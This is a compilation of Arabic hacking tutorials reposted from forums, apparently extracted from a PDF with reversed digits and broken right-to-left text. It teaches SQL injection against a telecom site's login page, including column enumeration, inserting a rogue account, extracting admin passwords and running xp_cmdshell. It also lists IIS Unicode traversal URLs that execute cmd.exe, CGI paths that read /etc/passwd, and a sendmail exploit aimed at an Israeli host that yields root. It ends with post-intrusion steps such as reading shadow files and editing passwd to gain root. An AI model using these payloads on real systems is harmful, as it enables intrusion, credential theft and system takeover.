                                                                ‫ونفس التفاصيل تحدث لكلمة المرور‬
‫مالحظه مهمه جدا ُ: القيمه ‪ TRUE‬التي نحصلها من الشرط ليست مساويه للكلمه ‪ TRUE‬التي نكتبها على‬
                                                                          ‫لوحة المفاتيح الخاصه بنا‬
          ‫لذلك ال تحاول إستخدام أسم مستخدم ‪ TRUE‬وكلمة مرور ‪ TRUE‬إلتمام الـ‪SQL injection‬‬

                  ‫الشرط السابق سيقوم بأختيار أول سطر من الجدول ‪ Users‬ويرجع محتوياته في مصفوفه‬
                                  ‫وبالتالي في بعض الحاالت ستجد أنك قد أستطعت الدخول للصفحة المحميه‬
                                                                              ‫ولكن في حاالت أخرى ال‬
                                                                                   ‫لنكمل التفاصيل.....‬
     ‫يجب التنبه ألنه ربما يكون الشرط في أمر الـ ‪ SQL‬وهو ما يأتي بعد ‪ WHERE‬يتحقق من عدة أشياء‬
‫لذلك نستخدم )‪ -- (two dashes‬ليتم إهمال بقية السطر , حيث يمكننا اإلستعاضه عن ما أدخالناه قبل قليل‬
                                                                                      ‫بالمدخالت التاليه‬
                                                                  ‫أسم مستخدم--'1'='1' ‪: blah' OR‬‬
    ‫وكذلك كلمة المرور ( في بعض الحاالت يمكنك إهمال كتابة كلمة مرور ألن -- ستهملها ألنها تأتي بعد اسم‬
                                                                            ‫المستخدم في أمر الـ‪SQL‬‬




                                                 ‫042‬
               ‫توجد طريقه مريحه جدا ومضمونه بحيث أنك لن تحتاج لتخمين أحد أسماء األعمده‬
                                                           ‫وهي أستخدام‪having clause‬‬
                                                                            ‫بالطريقه التاليه‬
                                                              ‫أسم مستخدم'1=1 ‪--having‬‬
                                                      ‫حيث سنحصل على رسالة خطأ كالتاليه‬
         ‫'41‪Microsoft OLE DB Provider for ODBC Drivers error '80040e‬‬

             ‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬
       ‫‪'cs_isp_user.UserID' is invalid in the select list because it is not‬‬
‫.‪contained in an aggregate function and there is no GROUP BY clause‬‬

                                     ‫33 ‪/Arabic/Scripts/ar_csd_reply.asp, line‬‬
                                                          ‫وبها أسم الجدول وأيضا أسم أول عمود‬
                                                ‫بعدها لنستطيع الحصول على اسماء بقية األعمده‬
                                                                          ‫سنستخدم‪group by‬‬
                                                                                ‫بالشكل التالي‬
                                                   ‫'‪--group by cs_isp_user.UserID‬‬
                                                      ‫بعدها سنحصل على عمود أسمه‪passwd‬‬
                                      ‫فنستخدمه للحصول على اسم العمود اللي يليه بالشكل التالي‬
                      ‫'‪--group by cs_isp_user.UserID,cs_isp_user.passwd‬‬
    ‫ونكرر زيادة أسم كل جدول مع العمود إلى أن نحصل على صفحة تخبرنا بأن أسم المستخدم خاطئ !‬

                         ‫نحتاج األن أن نقوم بجمع أكبر قدر ممكن من أسماء األعمده في هذا الجدول‬
                                                                            ‫نقوم بإدخال التالي:‬
                                          ‫أسم مستخدم--)‪: blah' group by (username‬‬
                                                                    ‫فنحصل على الخطأ التالي :‬
                                                                                ‫اقتباس :‬




              ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
                                                     ‫'41‪'80040e‬‬
        ‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid‬‬
                                      ‫.'‪column name 'username‬‬
                        ‫33 ‪/arabic/Scripts/ar_csd_reply.asp, line‬‬




                        ‫وهو ما يفيد بأنه ال يوجد عمود في هذا الجدول له األسم‪username‬‬
              ‫نقوم بتجربه األسماء الشائعه مثل‪password ,username,id,userid,email‬‬
                                                                     ‫‪,first_name‬‬
                         ‫عند تجربتنا لـ ‪ userid‬فأننا نحصل على خطأ أخر وهو ما نبحث عنه‬
                                                                                ‫اقتباس :‬




                                          ‫142‬
                  ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
                                                           ‫'41‪'80040e‬‬
          ‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬
         ‫‪'cs_isp_user.passwd' is invalid in the select list because it‬‬
              ‫‪is not contained in either an aggregate function or the‬‬
                                                 ‫.‪GROUP BY clause‬‬
                            ‫33 ‪/arabic/Scripts/ar_csd_reply.asp, line‬‬




                                   ‫هنا حصلنا على معلومتين وهي أسم الجدول وهو‪cs_isp_user‬‬
                                                            ‫وأيضا أسم أحد األعمده وهو‪passwd‬‬
                                     ‫نقوم االن بتكرار العمل السابق ولكن بإستخدام اسم العمود الجديد‬
                              ‫فنقوم بإدخال أسم المستخدم التالي--)‪: blah' group by (passwd‬‬
                                                                        ‫فنحصل على الخطأ التالي :‬
                                                                                   ‫اقتباس :‬




                ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
                                                           ‫'41‪'80040e‬‬
         ‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬
       ‫‪'cs_isp_user.UserID' is invalid in the select list because it is‬‬
       ‫‪not contained in either an aggregate function or the GROUP‬‬
                                                           ‫.‪BY clause‬‬
                           ‫33 ‪/arabic/Scripts/ar_csd_reply.asp, line‬‬




                      ‫حصلنا على أسم عمود وهو ‪ UserID‬وهو نفسه ما قمنا بتخمينه وهو‪userid‬‬
                           ‫تجدر اإلشاره إلى أن ‪ MS SQL Server‬ليس حساس لحالة األحرف :)‬
       ‫نالحظ أننا سنكون في حلقه غير منتهيه وال نحصل إال على أسماء الجداول ‪ UserID‬و‪passwd‬‬
                                       ‫إذن الجدول ال يحوي إال على عمودين وهي التي حصلنا عليها‬
      ‫إذن في الحاله هذه نقوم بأدخال مستخدم جديد للجدول وبعدها نقوم بالدخول بشكل طبيعي من الصفحه‬
                                                                      ‫الخاصه بتسجيل الدخول :)‬
                            ‫سنقوم بكتابة التالي في خانة أسم المستخدم : ‪blah' INSERT INTO‬‬
                                                          ‫‪cs_isp_user(UserID,passwd‬‬
                                                                   ‫--)'‪) VALUES('M_3','hi‬‬
                               ‫حيث سيتم إضافة مستخدم جديد له أسم مستخدم 3_‪ M‬وكلمة مرور‪hi‬‬
                     ‫وبعدها تستطيع الدخول للصفحة المحميه بهذه البيانات على أنك مخول له بالدخول‬

‫في مثالنا (شركة اإلتصاالت) أنتهينا من استغالل أمكانية عمل ‪ inject‬لها ولكننا سنكمل الحديث عن طريقه‬
‫ممتعه لكي نستطبع قرائة اسماء المستخدمين وكلمات مرورهم وبعدها تستطيع الدخول بأي منها دون إضافة‬
                                                                                            ‫نفسك‬
                                          ‫وهو األمر الذي لن يضع شكوك حول وجود لشخص مشبوه‬



                                             ‫242‬
  )‫ وهو رقم تسلسلي لكل مستخدم ( تذكر أنه رقم‬id ‫سنكمل ما بدأناه ولكن بإضافة عمود أخر له األسم‬
                                                                  user‫إذن لدينا جدول أسمه‬
                                                                        ‫يحوي االعمده التاليه‬
                                                                         ‫وهو رقم صحيح‬id
                 admin1‫وهو قيمة نصيه ( القيم النصيه يمكن أن تحوي أرقام) مثال‬username
                                                             ‫وهي أيضا قيمه نصيه‬passwd

‫ لقيمه نصيه وتحويلها إلى قيمة عدديه ( لن يتم التحويل ولكنه سيخرج رساله خطأ‬union ‫نجرب عمل‬
                                                                                  )‫ثمينه جدا‬
              : blah' union SELECT username FROM user‫ندخل اسم المستخدم‬
                                                   ‫و سنحصل على رسالة خطأ ال تفيدنا في شيء‬
                                                                             ‫رسالة الخطأ هي‬
                                                                               : ‫اقتباس‬




             Microsoft OLE DB Provider for ODBC Drivers error
                                                   '80040e14'
           [Microsoft][ODBC SQL Server Driver][SQL Server]All
      queries in an SQL statement containing a UNION operator
      must have an equal number of expressions in their target
                                                         lists.
                                     /admin/admin.asp, line 13




                                                   ‫ مره واحد فتصبح بالشكل التالي‬id ‫نقوم بزيادة‬
                     blah' union SELECT username,username FROM user
                                                                  ‫فنحصل على نفس رسالة الخطأ‬
                                               ‫نتابع الزياده إلى أن نحصل على رسالة خطأ مختلفه‬
                      ‫لنفترض أننا حصلنا على رسالة الخطأ الجديده عند أدخال اسم المستخدم التالي‬
                        blah' union SELECT username,username,usernam
                                               e,username,username FROM user
                                                                 ‫فنحصل على رسالة الخطأ التاليه‬
                                                                               : ‫اقتباس‬




             Microsoft OLE DB Provider for ODBC Drivers error
                                                   '80040e07'
       [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
                                          error converting the
       varchar value 'Lame_Admin' to a column of data type int.
                                     /admin/admin.asp, line 13




                                         243
                                                         ‫ً‬
                                          ‫):حصلنا على أول أسم مستخدم وهو عادة ما يكون لألدمن‬
               ‫وسبب ظهور هذا الخطأ هو ألننا نطلب من محرك ‪ SQL‬أن يقوم بتحويل قيمة نصيه (وهي‬
                                                ‫)‪Lame_Admin‬إلى قيمة عدديه صحيحه)‪( int‬‬
  ‫وهو الشيء الغير مسمو ح , لذلك يقوم بأخبارك أنه ال يستطيع تحويل ‪ Lame_Admin‬إلى قيمة عدديه‬
                                             ‫صحيحه :) هذا أذكى شي قامت ‪ microsoft‬بعمله :)‬
                                 ‫االن حصلنا على أسم المستخدم وسنحاول الحصول على كلمة المرور‬
     ‫ندخل أسم المستخدم التالي‪:blah' union SELECT passwd,passwd,passwd,pass‬‬
                                                                ‫‪wd,passwd FROM user‬‬
                                                 ‫بنفس العدد السابق عند حصولنا على أسم المستخدم‬
                                                                         ‫سنحصل على هذا الخطأ‬
                                                                                        ‫اقتباس :‬




                   ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
                                                            ‫'70‪'80040e‬‬
             ‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax‬‬
                                                   ‫‪error converting the‬‬
                    ‫.‪varchar value 'stupid' to a column of data type int‬‬
                                              ‫31 ‪/admin/admin.asp, line‬‬




   ‫حصلنا على أسم المستخدم وكلمة المرور ويمكننا تسجيل الدخول للصفحة المحميه بدون وجود أي أثر لنا‬
‫إال إذا كانت الصفحه المحميه عند الدخول لها تقوم بطباعة بعض المعلومات مثل رقم االيبي ألخر شخض قام‬
                                                                        ‫بالدخول بإسم المستخدم هذا‬
                                                                    ‫عندها فكر بما ستقوم به بنفسك‬

                                                          ‫بقي أتكلم عن الـ ‪Stored Procedure‬‬
                       ‫وهي كتشبيه أقرب إلى أدوات موجوده مسبقا ‪ Built-in‬تقوم بعمل محدد عند طلبها‬

 ‫ستستطيع اإلستفاده من الـ ‪ Stored Procedure‬إذا كان الـ ‪ SQL Server‬يعمل على المستخدم‪sa‬‬
                   ‫أو إذا كان المستخدم الذي يعمل عليه الـ ‪ SQL Server‬تم السما ح له باٍستخدامها‬

                                   ‫لذلك فأنت محظوظ عند حصولك على ‪ SQL Server‬بهذه األمكانيات‬

                                                         ‫يوجد أكثر من 222 ‪Stored Procedure‬‬
                                                                                ‫في الجدول التالي أهمها‬
‫-------------------------------------------------------------------------+---------------------------+‬
                                                                                                ‫+-----‬
‫|----------‪| xp_cmdshell‬تمرير أمر لنظام التشغيل ( يتم تنفيذه على حسب صالحيات المستخدم)-----‬
                                                                                                    ‫--|‬
‫|-----------‪| xp_regread‬قراءة قيمة مفتا ح في الريجستري-----------------------------------------‬
                                                                                                   ‫---|‬
‫|----‪| xp_regdeletekey‬حذف مفتا ح من الريجستري----------------------------------------------‬
                                                                                                   ‫---|‬



                                                 ‫442‬
‫|-‪| xp_regdeletevalue‬حذف قيمة مفتا ح من الريجستري-----------------------------------------‬
                                                                                                  ‫---|‬
‫|---------- ‪| xp_regwrite‬للكتابة في الريجستري---------------------------------------------------‬
                                                                                                 ‫----|‬
 ‫|--‪| xp_servicecontrol‬لبدأ أو أنهاء خدمة على السيرفر-----------------------------------------‬
                                                                                                  ‫---|‬
‫------------------------------------------------------------------------+----------------------------+‬
                                                                                               ‫+-----‬




                                ‫أما طريقة اإلستفاده من أي من هذه الـ ‪ Procedure‬فهي بالشكل التالي‬
                                                       ‫‪'exec master..xp_cmdshell 'dir‬‬


                                         ‫هذا مثال لطريقة أستخدام ‪ xp_cmdshell‬والبقيه مثله‬
                                                      ‫عدا الكتابة في الريجستري فهو بالشكل التالي‬
                            ‫‪'exec master..xp_regwrite 'REGISTERY KEY' VALUE‬‬


  ‫أيضا بقي اإلشاره إلى أنه بأمكانك قراءة كود ملفات ‪ asp‬التي يعمل عليها الموقع عن طريق إضافة جدول‬
                                                     ‫جديد ومن ثم نسخ كود صفحة ‪ asp‬ووضعه‬


                                                           ‫في هذا الجدول بالطريقة التاليه‬
                                ‫0008(‪((CREAT TABLE M_3 ( source varchar‬‬
‫هذا السطر يقوم ببناء الجدول وأسم الجدول 3_‪ M‬وبداخله عمود واحد من النوع ‪ varchar‬حجمه 2220‬
                                                                                     ‫بايت‬

            ‫بعد ذلك بأمكانك االن إضافة أي ملف على السيرفر إلى هذا الجدول ومن ثم قرائته بالشكل التالي‬
                                    ‫‪'bulk insert M_3 from 'c:\InetPub\wwwroot\login‬‬
                                                                                              ‫‪.asp‬‬

             ‫ولقرائة ما تم نسخه يمكنك ذلك عن طريق رسائل الخطأ اللي تكلمنا عنها في الموضوع السابق‬
                                  ‫أسهلها هو عمل ‪ union‬حيث يتم توليد رسالة خطأ بها ما تم نسخه.‬



                                              ‫انتهى،،،‬




           ‫" درس إلحتراف الهاك في اختراق المواقع "‬

                                                            ‫<منقول من منتديات شبكة الحزم اإلسالمية>‬
                                                                                ‫<الكاتب:‪> CONIK‬‬


                                                ‫542‬
    ‫أن شاء هللا في تعلم أختراق المواقع وكيف يتم ولكن في البداية يجب أن نعلم أشياء عن االختراق‬


       ‫في البداية أو بمعنى أخر نعرف أساسيات مطلوبة في علم اختراق المواقع وطبعا نحن قلنا‬


      ‫في الدرس األول الى كان عن اختراق االجهزة أنه األى بى هو الباب والبورت هو المفتا ح له‬


    ‫بس في أختراق المواقع يوجد لنا باب ولكن المفتا ح يختلف وهو الثغرات ومافي اختراق في الدنيا‬

                ‫بدون ثغرة المهم المفروض ما نقول ثغرة ولكن نقول ضعف أمنى :-‬


                  ‫س2:- طيب ممكن تقول لى أيش هي الثغرات يعنى تعريف لها ؟؟‬


‫جـ:- الثغرات هى ضعف أمنى يساعدك فى دخول نظام معين وأختراقه وقد تكون أيضا الطريقة المساعدة‬


‫التى تخليك تتحول من ‪ user‬الى ‪ administrator‬يعنى من مستخدم الى المدير المتصرف وتتضمن‬
                                         ‫ويجب‬


      ‫على الدوام معرفة الثغرات االمنيه الجديدة وأستثمارها علشان ال يتنبه أصحاب المواقع بيها‬


                                     ‫يرقعوها ( يتم تقفليها )‬


‫وأقرب مثال لهذه الثغرات الضعف األمني الذى أكتشف في االباتشى وهو سيرفر يركب على نظام ليونكس‬


    ‫وأى ضعف فى أحد البرامج أو قاعده بناء الموقع تعتبر ثغرة ومن الممكن استخدامها واألستفاده‬


‫منها في أختراق الموقع المراد أختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ما تريد عن طريقها‬


                        ‫س6:- طيب كيف انا استثمر الثغره اذا انا لقيتها ؟؟؟‬


‫جـ:- من وقت ما أكتشفوا الثغرات كانت نسبة 88% من الثغرات تكون سكربتاتها مكتوبه بالغه ‪ C‬وانته‬
                                   ‫تحتاج لمعرفة هذه اللغه أو‬

                                         ‫عليك تحويلها .‬

‫كما أن هناك العديد من الثغرات يحتاج الى ‪ shell‬حتى انته تتمكن من األستفاده من هذه الثغره أو بمعنى‬
                                           ‫أخر الضعف‬


                                              ‫642‬
    ‫وعلى سبيل المثال بعض الثغرات الموجوده فى ‪ PHP‬تحتاج الى ‪ Shell PHP‬ومن هذه الكالم.‬

                            ‫وعلى فكرة الضعف يكون في االصدارات الخاصة‬


           ‫وكمان في ثغره من نوع ‪ Kernel 2.2.x‬ولكن هذه المرة في نظام تشغيل ليونكس‬


 ‫(مالحظه هذه الثغرات التى تكون باللغة ‪ C‬تكون سيكربتات توجوده فى الموقع ) وهناك أيضا سيكربتات‬
                                    ‫أخرى مكتوبة باللغه‪perl‬‬


 ‫والزم فى هذه الحالة تكون انته مركب لوينكس علشان االوامر وأنا أنصحك تركب3.7 ‪linux Redhat‬‬


‫ألنه أفضل من الماندريك وأذكر انه األخ بالك هانتر لمن انا سألته أركب الماندريك وال الريد هات قال لى انه‬
                                       ‫الماندريك صورة مبسطه‬


 ‫للريد هات بس غير قابله للتطور وأنه الريدهات أقوى وجزاة هللا خير على هذه النصيحة نرجع للموضوع‬


                                   ‫س3:- كيف أحول لغه البيرل ؟؟‬

                ‫جـ:- الطريقة مره سهله كلها اوامر عادية في البداية انته سوى هذه األمر‬

                                              ‫‪./file.pl‬‬

                                          ‫تعطيك هذه الرسالة‬

                      ‫----‪Access Denied‬هذه الرسالة توضح عدم الموافقه‬

                            ‫أذا صار لك كذا كا عليك سوى كتا بته االمر هذه‬


                ‫-----‪chmod +x Conik.pl‬الحظ مكان كونيك انته تكتب أسم الملف‬


                          ‫وشغلة مره ثانية وشوف النتجيه را ح تكون زى كذا‬
                                         ‫‪$ ./Conik.pl‬‬

                                      ‫س.:- طيب بالنسبة للغة‪C‬‬

             ‫جـ:- علشان تحويل الملف الزم انته تخلى الملف يكون ملف تنفيذى بهذه االمر‬


  ‫>------ ‪gcc -o Conik Conik.c‬الحظ انه انته تكتب أسم الملف بدال أسمى كونيك المراد تغيرة‬

                                      ‫يعنى على سبيل المثال :-‬


                                                ‫742‬
                                  ‫‪gcc -o Conik conik.c‬‬


                              ‫ورا ح يكون الملف جاهز بعد هذه االمر‬

                                          ‫‪./Conik.c‬‬

                                     ‫وبعد ماصار الملف جاهز‬


                            ‫‪$ gcc -o sendmail sendmail.c‬‬

                                      ‫‪$ ./sendemail‬‬


          ‫>‪Usage : sendmail <host> <OS> <user> <password‬‬
 ‫>----- ‪$ ./sendmail smtp.israel.com RedHat-7.3 anonymous anonymous‬‬
                  ‫الحظ انك انته تكتب هنا الموقع الى تبغاه مكان‪israel‬‬
                           ‫...‪connecting to host‬‬
                                 ‫...‪connected‬‬
                                        ‫‪id‬‬
                         ‫)‪uid=0(root) gid=0(root‬‬


     ‫الحظ انه طلب ممنا الملقم للبرنامج ‪ Sendemail‬وكمان طلب نظام التشغيل واليوزر والباسورد‬

       ‫وبعد هذه كله البرنامج أعطانا أمتياز ‪ Root‬بسبب قيام البرنامج بتنفيذ الـ‪Exan nofer‬‬

‫مالحظة ال تضن أنه لمن انا حطيت البرنامج ‪ XXX. SENDMAIL‬بدون اى سبب أنا حطيت لك هذه المثال‬
                                  ‫آلنه هناك ثغره فى هذه البرنامج‬

                ‫ورا ح أشرحها لك أن شاء هللا تعالى بس كان بدى تحفظ األسم هذه :-)‬

                        ‫الظاهر انه نحنا أتوغلنا فى الموضوع زايدة عن اللزوم‬
                     ‫س5:- يا هللا كل هذه علشان ثغره بس بطلت أنا ما أبغا اتعلم‬


   ‫جـ:- لووووول حبيب البى هذه الطريقة المعقده شوية للثغرات في ثغرات ثانية حلوة وسهله جدا جدا‬


      ‫س2:- أيش هي قو ل يا ‪ Conik‬ترى هذه الطريقة يبغالها نظام تشغيل وكمان لغه ‪ C‬و‪Perl‬‬

 ‫في تغرات تستخدم من خالل المتصفح يعنى انته تشوف ملعومات الموقع عبر المتصفح وتوصل الى ملف‬
                                ‫الباسوردات من هذه الطريقه‬

                ‫ومثال على هذه الثغرات‪PHP - CGI - UNICODE - VB - etc‬‬




                                              ‫842‬
  ‫ أنا سمعت عنها كثير نفسى اشوف كيف شكلها وأعرف ويش هى ؟؟؟‬UNICODE ‫س1:- اوووووة‬


 ‫ مما تساعد في أختراق‬Microsoft ‫ في‬IIS ‫ هى عبارة عن ضعف في نظام‬UNICODE ‫جـ:- حبيبى‬
                     ‫الموقع بكل سهوله عموما االختراق بهذه الطرق سهل جدا‬

    UONICODE :-‫مقارنة بالطرق السابقة التى تم ذكرها من قبل وسوف أضع أمثله على ثغرات‬

/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%3
               5%63../winnt/system32/cmd.exe?/c+dir+c:\

/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?
                          /c+dir+c:\

/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/
                         cmd.exe?/c+dir+c:\

/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system
                       32/cmd.exe?/c+dir+c:\

        /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
                                 +c:\

                               /cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.
                          exe?/c+dir+c:\

                      UONICODE‫حاولت قد المستطاع انى أشكل فى أنواع‬


                           ‫ هذه مثال عليها‬CGI ‫أما بالنسبة الى ثغرات الـ‬

                 /cgi-bin/view-source?../../../../../../../etc/passwd

                                        /cgi-bin/phf

                                 /cgi-bin/wwwboard.pl

                                 /cgi-bin/AT-admin.cgi

                                    /cgi-bin/info2www

                                   /cgi-bin/environ.cgi


 ‫هذه وباقى العديد من الثغرات يعنى ال يقتصر األمر على هذه الثغرات ورا ح أقسم الثغرات لك بحسب نظام‬
                                             ‫التشغيل‬



                                              249
                 NT : Uni code , bofferoverfollow , tftp


Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , ProFTPD,
                 WU-FTPD, Kernel Exploits, rootkits,


 UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel
               exploits, rootkits, ProFTPD, WU-FTPD,

                                 ،،،‫انتهى‬




           " ‫"استغالل لينكس في اختراق المواقع‬
                                                >‫<منقول من موقع الجهاد اإللكتروني‬
                                                 > Black_sNiper:‫<الكاتب‬




                                   250
  ‫هذا الموضوع مخصص لمن أراد التعامل مع لينكس في اختراق المواقع وليس لديه الخبرة الكافية فيه ...‬
 ‫سوف يكون هذا الموضوع عن العمليات التي يستحسن القيام بها بعد الحصول على كلمة السر والنجا ح في‬
                                                                                ‫الدخول على النظام ..‬
 ‫أوال يجب ان تعرف بأنه يمكن ان تدخل على بعض االنظمة باستخدام بعض الكلمات المشهورة وتوجد بعض‬
          ‫االنظمة تسمح لك بتنفيذ أمر واحد ثم تقوم باخراجك من النظام بعد ذلك وأفضل تلك األوامر هي .:‬



                                                                                                ‫‪who‬‬
                                                                                               ‫‪rwho‬‬
                                                                                              ‫‪finger‬‬

 ‫وتستفيد من هذه األوامر بأنك تستعرض اسماء المستخدمين للنظام وبذلك يمكن ان تستخرج كلمة السر من‬
                 ‫نفس االسم وذلك ألن بعض المستخدمين يستعمل كلمة سر مشابهة تقريبا ألسمه مثل .:‬

                                                                             ‫‪username : Black‬‬
                                                                            ‫2‪password : Black‬‬

                                             ‫وفي بعض األنظمة تستطيع الدخول بكتابة ‪ test‬أو ‪demo‬‬

                             ‫من الملفات المهمة والتي يجب عليك استخراجها بعد دخولك على أي نظام .:‬
                                                                               ‫‪/etc/passwd‬‬
                                                                                 ‫‪/etc/group‬‬
                                                                                  ‫‪/etc/hosts‬‬
                                                                           ‫‪/usr/adm/sulog‬‬
                                                                       ‫‪/usr/adm/loginlog‬‬
                                                                          ‫‪/usr/adm/errlog‬‬
                                                                           ‫‪/usr/adm/culog‬‬
                                                                                    ‫‪/usr/mail‬‬
                                                                   ‫‪/usr/lib/cron/crontabs‬‬
                                                                               ‫‪/etc/shadow‬‬

                                                                                  ‫الحساب .: ‪bin‬‬
‫وهو مهم حيث يحتوي على حساب المستخدم ويوجد به معظم الملفات المهمة وقد يوجد ملف كلمة السر واذا‬
                                                                                  ‫كان كذلك فيمكن‬
                                 ‫(أحيانا )اضافة كلمة سر خاصة بك وتضيف حساب دخول( روت )لك !!‬
                                                                      ‫والطريقة بسهولة كالتالي .:‬
                                                                               ‫$ ‪ed passwd‬‬

                              ‫وأخيرا تقول ‪ exec login‬وتكتب أي اسم وبذلك تكون انت مدير النظام !!‬

                            ‫ما الذي سوف تواجهه عند دخولك على أي نظام بكلمة سر واسم مستخدم ؟ !!‬
                                                  ‫عند دخولك الى النظام ستقابل احدى هذه االحتماالت .:‬
     ‫اما انك استطعت الحصول على حساب مدير النظام( الروت )أو انك حصلت على حساب مستخدم آخر ..‬
                                                                         ‫في البداية تكتب االمر التالي .:‬
                                                                                              ‫$ ‪pwd‬‬
                                                                                       ‫والنتيجة تظهر .:‬
                                                                                    ‫$ /‪usr/admin‬‬
       ‫النتيجة اظهرت انك استطعت الدخول على المدير وبذلك تستطيع التعامل مع كامل النظام بدون قيود ..‬
                                                            ‫اذا ظهرت نتيجة غير تلك النتيجة .. فمثال :‬


                                                ‫152‬
                                                                              ‫$ /‪usr/Black‬‬
                                             ‫فهذا يدل على انك دخلت على حساب هذا المستخدم !!‬
                                                     ‫ولعرض ملفات هذا المستخدم تكتب اآلتي .:‬
                                                                           ‫$ ‪ls /usr/Black‬‬
                                                       ‫وسوف يعرض لك ملفات هذا المستخدم .:‬
                                                                                       ‫‪mail‬‬
                                                                                       ‫‪pers‬‬
                                                                                    ‫‪games‬‬
                                                                                         ‫‪bin‬‬
                                                            ‫ولكن هذا لن يعرض ملف ‪.profile‬‬
                                                                  ‫ولكي تستعرضه تكتب اآلتي .:‬
                                                                                       ‫$ ‪cd‬‬
                                                                                     ‫$ ‪ls -a‬‬
                                                                                           ‫:‬
                                                                                           ‫:‬
                                                                                   ‫‪.profile‬‬
                                                                                           ‫$‬

                                        ‫اذا اردت قراءة محتويات ملف فسوف تكتب األمر التالي .:‬
                                                                             ‫$ ‪cat letter‬‬
                                                  ‫وهذا اذا افترضنا ان الملف المطلوب هو ‪letter‬‬

                                                ‫اذا اردت تغيير كلمة السر فما عليك اال ان تكتب .:‬
                                                                                 ‫$ ‪passwd‬‬
                    ‫ثم سيطلب منك كلمة السر القديمة وهي طبعا معك !!وتدخل كلمة السر الجديدة ..‬

                                                    ‫للبحث عن معلومة معينة تكتب األمر التالي .:‬
                                                                    ‫$ ‪grep phone Black‬‬
                                   ‫وهذا بافتراض انك طلبت ارقام الهاتف الخاصة بالمستخدم اآلخر‬

                                                 ‫ولعمل نسخ من ملف الى ملف آخر تكتب اآلتي .:‬
                                                                      ‫$ ‪cp letter letters‬‬

                           ‫اذا اردت عمل محادثة مع مستخدم آخر على اتصال فتكتب األمر التالي .:‬
                                                                                  ‫$ ‪write‬‬

                                                      ‫ولمعرفة من يوجد على النظام نكتب اآلتي .:‬
                                                                                     ‫$ ‪who‬‬

                                                            ‫03:2 91 ‪safadM tty1 april‬‬
                                                               ‫91:2 91 ‪paul tty2 april‬‬
                                                            ‫13:2 91 ‪gopher tty3 april‬‬

‫واذا اردت قراءة الملف المحتوي على كلمات السر المظللة يجب ان تكون قد دخلت على النظام باستخدام‬
                                     ‫حساب المدير نفسه .. والستعراض ملف كلمات السر نكتب .:‬
                                                                   ‫$ ‪cat /etc/passwd‬‬
                                                       ‫:/:0000:1:0:43‪root:F943/sys‬‬
             ‫‪sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh‬‬
           ‫‪checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh‬‬



                                          ‫252‬
                                                    ‫وقد يظهر حساب آخر للمدير كالتالي .:‬
                                 ‫:‪Black:chips11,43:34:3:Mr doooom:/usr/Black‬‬

‫وهذا يعني انه يمكن للمستخدم االحتفاظ بكلمة السر لمدة ثالثة اسابيع بدون تغيير وانه يجب ان يغيرها كل‬
                                                                                     ‫ستة اسابيع ..‬
                                                                ‫استعراض ملف المجموعة كالتالي .:‬

                                                                             ‫$ ‪ls /etc/group‬‬

                                                                              ‫‪root::0:root‬‬
                                                                          ‫‪adm::2:adm,root‬‬
                                                                             ‫:07::‪bluebox‬‬



                                  ‫ويمكن ان يحتوي ملف المجموعة على كلمات سر أو اليحتوي !!‬
‫اذا كان اليحتوي على كلمة سر فانه يمكن ان تصبح انت مديرا للنظام في حالة دخولك بكلمة سر لمستخدم‬
                                                     ‫عادي وليس كمدير للنظام وذلك بعدة طرق..‬



                                           ‫انتهى،،،‬




 ‫" شرح مفصل من األلف إلى الياء في احتراف اختراق‬
            ‫المواقع عن طريق لينكس "‬

                                                                                        ‫<منقول>‬



                                             ‫352‬
                                                                                        ‫<الكاتب: ايسر >‬

                                                                       ‫‪UNix Usage IN HackinG‬‬
                                                                                            ‫اهال بكم جميعا‬
  ‫في البدايه احب ان انوه ان هناك العديد من الدروس الجميله فعال .. و لكنها قديمه و ليست ‪up to date‬‬
                         ‫لذلك اكتب لكم هذاالدرس المطول لكي يكون مكانا للمبتدئين يمكن ان يستفيدوا منه‬
                                                                 ‫و اتمنى فعال ان يحوز على اعجابكم :)‬
                                                                              ‫-بعض المصطلحات الهامه :‬
     ‫كثير من الناس يحبون ان يطلقوا على كل من ال ‪ pc , servers , supercomputers‬و غيرها‬
                                                                                              ‫كلمه ‪BOX‬‬
                 ‫النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ..باالضافه لليوزرز‬
                            ‫تسطيع ان تطلق على الرئيس هناك كلمه ‪ ... root‬و هو يكون‪, superuser‬‬
                                                                   ‫و هو االدمين او المدير على النظام....‬
                                                                                 ‫بالنسبه النظمه التشغيل :‬
  ‫طبعا .. ال يمكنك ان تخترق باستخدام نظام التشغيل ‪ .. windows‬بل تحتاج الى اي نظام مشتق من نظام‬
                                                                                      ‫التشغيل اليونيكس ..‬
                               ‫حسنا .. السؤال هو لماذا هذه االنظمه بالذات ... و لماذا ال يصلح الويندوز؟؟‬
                                                                                                 ‫لسبيبن :‬
‫2-االنترنت اغلبه اجهزه شغاله على اليونيكس سيستمز ...و نادر لما تالقي جهاز شغال على الويندوز . ‪nt‬‬
                                                                                                      ‫‪9x‬‬
 ‫اذن اقل حاجه حتى تخترق جهاز او سيرفير شغال على اليونيكس ..يجب ان تكون ملما بنظام التشغيل هذا..‬
                                                                   ‫لذا من االفضل انك تركبه في جهازك ..‬
